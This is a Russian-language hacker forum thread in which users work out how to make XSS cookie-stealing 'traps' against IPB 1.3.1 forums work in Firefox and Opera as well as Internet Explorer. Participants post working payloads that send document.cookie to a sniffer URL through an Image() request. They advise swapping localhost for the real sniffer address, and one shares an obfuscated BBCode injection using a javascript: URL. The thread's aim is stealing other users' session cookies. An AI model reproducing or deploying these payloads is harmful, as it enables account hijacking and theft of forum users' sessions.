Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка.

1) Установил IPB локально
2) Установил локально сниффер

подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0

Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость.

Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим.

Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало.

Создал тестовую хтмл, с текстом

<script>alert(document.cookie);</script>

<img src="http://localhost/s/s.gif">

<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>

Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие

Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?

----> как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?

Учись и больше читай.

такие советы я сам регулярно раздаю, я понимаю что не все скрипты одинаково работают, и соответсвенно разные приколы с приватностью и прочим.

Короче кто может детальной обьяснить, буду очень благодарен

---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.

ЗЫ, подчисти ящик, а то он ПМ больше не принимает.

Grtzzz.

---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.


то есть ты хочешь сказать что (выбрать нужное):

1) на данный момент нет готовых кодов для кражи кукисов из оперы/фаера
2) это не возможно
3) возможно, но надо рыть спецификацию

Там есть разница в синтаксисе.

Готовые коды есть в Уязвимостях форумов.

Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.

White Jordan, во всех его воплощениях, тоже неплохо описывал.

В гугле я тоже много чего читал по этому поводу.

В приведённом тобой коде первые две строчки лишние.

Там есть разница в синтаксисе.

Готовые коды есть в Уязвимостях форумов.


из тех что в теме "уязвимости IPB" у меня не один не сработал в Фаере/Опере



Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.

White Jordan, во всех его воплощениях, тоже неплохо описывал.


линк не затруднит?



В гугле я тоже много чего читал по этому поводу.

В приведённом тобой коде первые две строчки лишние.

В гугле я нашел кое-что, но не по теме, а о других различиях; а приведенный пример, это лишь отладка, я пытался выяснить что, когда и как работает с его помощью. Но сейчас попробую без первых двух

Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код

Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код

вот зараза...с первыми двумя строчками не работает, а сама по себе отлично. Проверено в Опере, Фаере. Надо сейчас только раздуплиться как сделать в кодах это, вы тоже подсказывайте, а то у меня ступор может начаться :)

Зачем такой длинный код?
<script>alert(document.cookie);</script>
<img src="http://localhost/s/s.gif">
<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>

Достаточно такого:
<script>var img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>

Достаточно такого:
<script>var img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>

аха, уже сообразил, я говорю - какой мне надо готовый код чтоб на форуме заюзать?

такой, как я написал. только localhost/s.gif замени на реальный адрес снифера

такой, как я написал. только localhost/s.gif замени на реальный адрес снифера

мы видимо друг друга не понимаем. Сейчас я использую

[HTM*L][EM*AIL][URL=*wj`=`][/U*RL][/EMAIL][/color][co*lor=#F0F5FF]` style=`background:url*(javascript:d*ocument.images[1].src="http://localh*ost/s/s.gif?"+docum*ent.cookie)`[/color]]

так вот из таких кодов что мне юзать? Тот что ты привел уже и впихивал в теги и сам по себе оставлял, пока 0

ЗЫ блин, не получается, как сделать внешний инклюд на ява скрипт?

Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.

link:http://forum.antichat.ru/thread12164.html